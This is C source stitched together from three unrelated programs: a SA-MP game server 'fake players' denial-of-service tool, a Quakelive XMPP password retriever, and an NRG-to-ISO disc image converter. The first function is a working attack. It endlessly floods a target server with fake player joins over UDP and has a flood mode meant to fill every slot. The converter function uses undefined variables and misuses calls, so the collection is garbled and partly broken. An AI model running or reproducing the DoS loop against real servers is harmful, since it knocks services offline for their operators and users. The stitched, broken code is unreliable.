int main(int argc, char *argv[]) {
struct sockaddr_in peer,
peerl;
struct linger ling = {1,1};
int sd,
i,
len,
ver = 1,
z = 0,
flood = 0,
full = 0,
joined = 0;
u16 port = PORT;
u8 *buff,
pass[128],
*host,
*p;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"SA:MP invisible Fake Players DoS "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: aluigi.org\n"
"edit: by Hordejoy\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s [options] <host[:port]>\n"
"\n"
"-p PORT server port that you can specify also after host, default is %hu\n"
"-f flooding option, perfect for slow connections or for testing servers\n"
" with many slots\n"
"\n", argv[0], port);
exit(1);
}
argc--;
for(i = 1; i < argc; i++)
{
if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2))
{
printf("\nError: wrong argument (%s)\n", argv[i]);
exit(1);
}
switch(argv[i][1])
{
case 'p':
{
if(!argv[++i]) exit(1);
port = atoi(argv[i]);
} break;
case 'f':
{
flood = 1;
} break;
default:
{
printf("\nError: wrong argument (%s)\n", argv[i]);
exit(1);
}
}
}
host = argv[argc];
p = strchr(host, ':');
if(p)
{
*p = 0;
port = atoi(p + 1);
}
peer.sin_addr.s_addr = resolv(host);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
peerl.sin_addr.s_addr = INADDR_ANY;
peerl.sin_port = htons(time(NULL));
peerl.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
buff = malloc(BUFFSZ + 1);
if(!buff) std_err();
p = buff;
p += putmm(p, "SAMP", 4);
p += putxx(p, peer.sin_addr.s_addr, 32);
p += putxx(p, ntohs(peer.sin_port), 16);
p += putxx(p, 'i', 8);
len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1, 0);
close(sd);
sampinfo(buff, len);
pass[0] = 0;
/* VERSION */
ver = 6; // remember to change this one with new versions!
/* VERSION */
printf("- start attack:");
for(;;)
{
printf("\n Player: ");
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
do
{
peerl.sin_port++;
}
while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) < 0);
p = buff;
switch(ver)
{
case 1: { z = 0; full = 0x14; joined = 0x12; p += putxx(p, 0x03, 8); break; }
case 2: { z = 0; full = 0x13; joined = 0x0b; p += putxx(p, 0x0a, 8); break; }
case 3: { z = 1; full = 0x1d; joined = 0x10; p += putxx(p, 0x0f, 8); break; }
case 4: { z = 1; full = 0x1b; joined = 0x11; p += putxx(p, 0x10, 8); break; }
case 5: { z = 0; full = 0x21; joined = 0x18; p += putxx(p, 0x17, 8); break; }
case 6: { z = 0; full = 0x1b; joined = 0x12; p += putxx(p, 0x11, 8); break; }
default:
{
printf("\nError: socket timeout, no reply received\n");
exit(1);
break;
}
}
p += putmm(p, pass, -1);
len = p - buff;
if(ver == 5) len = samp03_crypt(buff, len, port, 1, 0);
if(ver >= 6) len = samp03_crypt(buff, len, port, 1, 1);
len = send_recv(sd, buff, len, (flood == 2) ? NULL : buff, BUFFSZ, &peer, 0, z);
close(sd);
if(len < 0) {
printf("\n- no reply I try with an older version\n");
ver--;
continue;
}
if(flood == 2) {
waitms(FLOODMS);
continue;
}
// seems not used
//if(ver == 5) len = samp03_crypt(buff, len, port, 0, 0);
//if(ver >= 6) len = samp03_crypt(buff, len, port, 0, 1);
if(buff[0] == full) {
printf("server full");
sleep(ONESEC);
continue;
}
if(buff[0] != joined)
{
if((buff[0] == 0x13) || (buff[0] == 0x19))
{
// \wrong \not set
// version 2 doesn't want a password eh eh eh cool!
printf("\n- server is protected, insert the password:\n ");
fgetz(pass, sizeof(pass));
continue;
}
printf("\n- unknown packet reply (%d)\n", buff[0]);
//exit(1);
} else
{
if(flood)
{
printf("\n- start flooding\n");
flood = 2;
}
}
}
return(0);
}
int main(int argc, char *argv[]) {
mydown_options opt;
int len;
u8 content[1024],
*buff = NULL,
*mail = NULL,
*pass = NULL,
*xaid;
fputs("\n"
"Quakelive xmpp.quakelive.com password retriever "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s [mail_address] [password]\n"
"\n", argv[0]);
//exit(1);
}
if(argc >= 2) mail = argv[1];
if(argc >= 3) pass = argv[2];
if(!mail) mail = strdup(fgetz("enter the mail address of the account"));
if(!pass) pass = strdup(fgetz("enter the password of the account"));
if(!strchr(mail, '@')) {
printf("\nError: you must insert your account mail address, not the username\n");
goto quit;
}
memset(&opt, 0, sizeof(opt));
opt.verbose = 0; //-1;
opt.filedata = &buff;
opt.referer = "http://www.quakelive.com/";
opt.more_http = "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
/*"X-Requested-With: XMLHttpRequest\r\n"*/;
//snprintf(content, sizeof(content), "u=%s&p=%s&r=0", mail, pass);
snprintf(content, sizeof(content), "submit=&email=%s&pass=%s", mail, pass);
opt.get = "POST";
opt.content = content;
printf("- send mail and password to %s\n", QLURL1);
len = mydown(QLURL1, NULL, &opt);
if((len < 0) /*|| !buff*/) {
printf("\nError: something wrong on the quakelive.com webserver\n");
goto quit;
}
if(len > 0) buff[len - 1] = 0; // don't want to realloc for one byte
/*
if(!strstr(buff, "CODE\":0")) {
if(len < 0) len = 0;
printf("\n"
"Error: seems that your account has not been accepted:\n"
" %.*s\n", len, buff);
goto quit;
}
*/
free(buff);
opt.get = "GET";
opt.content = NULL;
opt.more_http = "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
"X-Requested-With: XMLHttpRequest\r\n";
printf("- get session informations from %s\n", QLURL2);
len = mydown(QLURL2, NULL, &opt);
if((len < 0) || !buff) {
printf("\nError: something wrong on the quakelive.com webserver\n");
goto quit;
}
if(len > 0) buff[len - 1] = 0; // don't want to realloc for one byte
xaid = strstr(buff, "\"XAID\":");
if(!xaid) {
printf("\n"
"Error: no XAID field found, check the reply received from the server\n"
"\n"
"%s\n"
"\n", buff);
}
xaid = show_qldata(buff, len);
/*
xaid = strchr(xaid, ':') + 1;
if(xaid[0] == '\"') {
xaid++;
l = strchr(xaid, '\"');
} else {
l = strchr(xaid, ',');
}
if(l) *l = 0;
*/
printf(
"- your current xmpp.quakelive.com password (XAID) is\n"
"\n"
" %s\n"
"\n", xaid);
free(buff);
quit:
fgetz("press RETURN to quit");
return(0);
}
unsigned short exec()
{
char buffer[1024 * 1024];
size_t size = 0, l, i;
size_t nrgSize;
struct stat buf;
FILE *nrgFile;
#ifdef WIN32
mywnd = GetForegroundWindow();
if (GetWindowLong(mywnd, GWL_WNDPROC)) {
p = argv[1];
argv = malloc(sizeof(char *) * 3);
if (argc < 2)
argv[1] = get_file();
else
argv[1] = p;
argv[2] = put_file(argv[1]);
argc = 3;
p = strrchr(argv[2], '.');
if (!p || (p && (strlen(p) != 4)))
strcat(argv[2], ".iso");
}
#endif
if (filename) { // reading data from a file
if (stat(filename, &buf) == 0) { // file exists
nrgSize = buf.st_size;
if (nrgSize < 1) {
if (destfile) printf("%s: file '%s' is empty\n", __progname, filename);
return -1;
}
if (!(nrgFile = fopen(filename, "rb"))) {
if (destfile) printf("unable to open the source file %%s\n");
return -1;
}
char buffy[17*2048];
if (fread(buffy, 1, sizeof(buffy), nrgFile) != sizeof(buffy)) {
if (destfile) printf("unable to read the source file %%s\n");
return -1;
}
if (is_iso(buffy)) {
if (destfile) printf("%s: %s is already an ISO 9660 image\n", __progname, filename);
if (destfile) printf("Nothing to do... exiting.\n");
return 1;
}
fseek(nrgFile, 307200, SEEK_SET);
} else { // specified input file doesn't exist
printf("%s: No such file '%s'\n", __progname, filename);
return -1;
}
} else { // no files specified
if (isatty(fileno(stdin))) { // stdin is a terminal
printf("please specify an input file\n");
return 1;
} else { // stdin is a file or a pipe
// TODO: read first 17 sectors, test with is_iso, then skip next (307200 - 17*2048) bytes
char buffy[17 * 2048];
fread(buffy, 1, sizeof(buffy), stdin);
if (is_iso(buffy))
return 1;
// skip first 307200 bytes of stdin
int skip = 307200 - sizeof(buffy);
while (skip--)
fgetc(stdin);
}
}
if (destfile && isatty(fileno(stdin))) { // write to a file
FILE *isoFile;
short percent;
short old_percent = -1;
isoFile = fopen(destfile, "wb+");
if (same_file(open(filename), open(destfile)) == 1) {
printf("%s: the source and the destination files are the same\n", __progname);
return -1;
}
while ((i = fread(buffer, 1, sizeof(buffer), (filename) ? nrgFile : stdin)) > 0) {
if (fwrite(buffer, i, 1, isoFile) != 1) {
printf("\n%s: cannot write to file %s\n", __progname, destfile);
return -1;
}
size += i;
percent = (int)(size * 100.0 / nrgSize);
if (percent != old_percent) {
old_percent = percent;
printf("\r[");
for (l = 0; l < percent * BAR_LENGTH / 100; l++)
printf("=");
printf(">");
l++;
for (; l < BAR_LENGTH; l++)
printf(" ");
printf("] %d%%", percent);
fflush(stdout);
}
}
printf("\r[");
for (l = 0; l < BAR_LENGTH; l++)
printf("=");
printf("] 100%%");
fflush(stdout);
fclose(nrgFile);
fclose(isoFile);
printf("\n%s written: %lu bytes\n", destfile, size);
} else { // stdout
while ((i = fread(buffer, 1, sizeof(buffer), (filename) ? nrgFile : stdin)) > 0)
fwrite(buffer, i, 1, stdout);
}
#ifdef WIN32
u8 ans[8];
if (GetWindowLong(mywnd, GWL_WNDPROC)) {
printf("\nPress ENTER to quit");
fgetz(ans, sizeof(ans), stdin);
}
#endif
return 0;
}
